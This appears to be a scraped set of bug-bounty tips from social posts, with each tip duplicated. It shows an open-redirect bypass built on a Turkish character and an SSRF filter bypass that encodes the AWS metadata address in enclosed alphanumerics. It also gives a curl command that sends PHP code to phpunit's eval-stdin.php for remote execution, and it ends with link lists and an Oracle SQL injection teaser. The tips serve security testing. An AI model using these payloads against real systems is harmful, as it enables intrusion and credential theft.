Open Redirect Bypass
?redirect=https://test.target.com > accepts any subdomain of target to redirect
?redirect=https://google.comğ.target.com > "Ğ" is a Turkish character, server can't render it and changes it to "?"
So it redirects to http://google.com/?target.com
#bugbounty #bugbountytip
?redirect=https://test.target.com > accepts any subdomain of target to redirect
?redirect=https://google.comğ.target.com > "Ğ" is a Turkish character, server can't render it and changes it to "?"
So it redirects to http://google.com/?target.com
#bugbounty #bugbountytip
Bypassing SSRF Filter using Enclosed Alphanumerics
AWS --> ①⑥⑨.②⑤④.①⑥⑨.②⑤④
AWS --> ①⑥⑨.②⑤④.①⑥⑨.②⑤④
#bugbountytip If you found /phpunit/ folder than you can try to execute PHP code by typing the following command:
curl --data "<?php echo(pi());" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
curl --data "<?php echo(pi());" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
#Sqli #bugbounty
https://t.co/Rg4aZzXGCl
https://t.co/E8pzuztGrs
https://t.co/33rsA6UdcY
https://t.co/cX7uDnrTbw
https://t.co/K5ozYnr9SR
https://t.co/VJrQvjcFq4
https://t.co/qjq65XcPID
https://t.co/cmu9ItaGbp
https://t.co/ynGJv2SRyh
#bugbountytips
https://t.co/Rg4aZzXGCl
https://t.co/E8pzuztGrs
https://t.co/33rsA6UdcY
https://t.co/cX7uDnrTbw
https://t.co/K5ozYnr9SR
https://t.co/VJrQvjcFq4
https://t.co/qjq65XcPID
https://t.co/cmu9ItaGbp
https://t.co/ynGJv2SRyh
#bugbountytips
Yappare
Tricky Oracle SQL Injection Situation
Recently I learnt few new stuff when solving SQL Injection found during pentest and also bugbounty. One of the new technique that seems new...